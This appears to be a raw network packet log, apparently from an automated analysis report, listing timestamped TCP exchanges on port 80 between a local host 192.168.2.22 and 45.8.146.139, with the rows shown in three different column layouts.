Aug 11, 2022 17:38:27.004987001 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005026102 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005049944 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005074024 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005084038 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005095005 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005119085 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005142927 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005162954 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005173922 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005193949 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005201101 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005234003 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005240917 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005266905 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005290985 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005306005 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005315065 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005341053 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005352020 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005378962 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005417109 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005462885 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005462885 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005490065 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005515099 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005522966 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005537033 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005578995 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005594969 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005620956 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005630970 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005659103 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005660057 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005692959 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005705118 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005729914 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005755901 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005764008 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005779982 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005805969 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005839109 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005840063 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005847931 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005873919 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005880117 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005908012 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005909920 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005939960 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005945921 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.005975008 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.005980968 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006000042 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.006010056 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006037951 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006048918 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.006072998 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.006082058 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006100893 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006105900 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006113052 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.006145954 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006149054 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.006179094 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.006184101 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006213903 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006216049 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.006254911 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006258965 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.006298065 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.006691933 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.108266115 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108315945 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108349085 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108381987 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108414888 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108448982 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108469009 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.108484983 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108493090 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.108526945 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.108535051 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.108540058 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108598948 CEST  49173        80         192.168.2.22  45.8.146.139
Aug 11, 2022 17:38:27.108833075 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108870029 CEST  80           49173      45.8.146.139  192.168.2.22
Aug 11, 2022 17:38:27.108907938 CEST  49173        80         192.168.2.22  45.8.146.139
                                            Aug 11, 2022 17:38:27.108947039 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.108952045 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109302044 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109354973 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109389067 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109391928 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109424114 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109428883 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109435081 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109458923 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109479904 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109493971 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109509945 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109541893 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109612942 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109663963 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109690905 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109798908 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109801054 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109842062 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109849930 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109894037 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109894991 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109944105 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109949112 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109996080 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110001087 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110055923 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110057116 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110105038 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110106945 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110141993 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110153913 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110176086 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110186100 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110202074 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110219955 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110236883 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110251904 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110275030 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110311985 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110342026 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110348940 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110352039 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110390902 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110395908 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110424042 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110428095 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110460043 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110467911 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110502958 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110513926 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110539913 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110544920 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110574961 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110580921 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110620975 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110624075 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110631943 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110656977 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110661983 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110693932 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110697985 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110728979 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110748053 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110769033 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110771894 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110814095 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110816956 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110853910 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110867023 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110888004 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110898972 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110922098 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.110930920 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.110970974 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.111006021 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.111016989 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.111053944 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.111180067 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.211446047 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211518049 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211572886 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211613894 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.211631060 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211633921 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.211683035 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211684942 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.211728096 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.211731911 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211770058 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211786032 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.211803913 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211816072 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.211839914 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211843967 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.211877108 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.211886883 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.211918116 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.212089062 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.212126970 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.212157965 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.212165117 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.212173939 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.212199926 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.212208033 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.212244034 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.212354898 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.213710070 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.213767052 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.213815928 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.213848114 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.213872910 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.213881016 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.213903904 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.213923931 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.213927984 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.213980913 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.213982105 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.214027882 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.214037895 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.214085102 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.214088917 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.214128971 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.214142084 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.214184999 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.214198112 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.214240074 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.214250088 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.214299917 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.214302063 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.214353085 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.215420008 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215480089 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215528965 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215553045 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.215569019 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.215580940 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215632915 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215636015 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.215665102 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.215683937 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215738058 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215785027 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215831041 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.215833902 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215838909 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.215841055 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.215882063 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215929031 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.215976954 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216007948 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216015100 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216018915 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216021061 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216022968 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216023922 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216027975 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216080904 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216130972 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216177940 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216226101 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216272116 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216319084 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216367006 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216407061 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216408014 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216414928 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216417074 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216418982 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216420889 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216423035 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216423988 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216425896 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216444969 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.216451883 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216455936 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216483116 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.216547012 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.314824104 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.314887047 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.314929962 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.314934969 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.314964056 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.314969063 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.314974070 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315010071 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315020084 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315052032 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315058947 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315090895 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315097094 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315138102 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315174103 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315179110 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315182924 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315217018 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315223932 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315258026 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315259933 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315298080 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315339088 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315428972 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315470934 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315521955 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315527916 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315530062 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315531969 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315534115 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315536022 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315582991 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315634012 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315692902 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315723896 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315731049 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315749884 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315798998 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315840006 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315854073 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315859079 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315876961 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315882921 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315922022 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315938950 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.315975904 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.315998077 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316037893 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316054106 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316092968 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316113949 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316153049 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316194057 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316236019 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316268921 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316298962 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316319942 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316334009 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316356897 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316402912 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316420078 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316482067 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316519022 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316541910 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316570044 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316586018 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316596031 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316637993 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.316658974 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316723108 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.316770077 CEST4917380192.168.2.2245.8.146.139
Aug 11, 2022 17:38:27.316781998 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
Aug 11, 2022 17:38:27.316787004 CEST | 80 | 49173 | 45.8.146.139 | 192.168.2.22
Aug 11, 2022 17:38:27.316828012 CEST | 49173 | 80 | 192.168.2.22 | 45.8.146.139
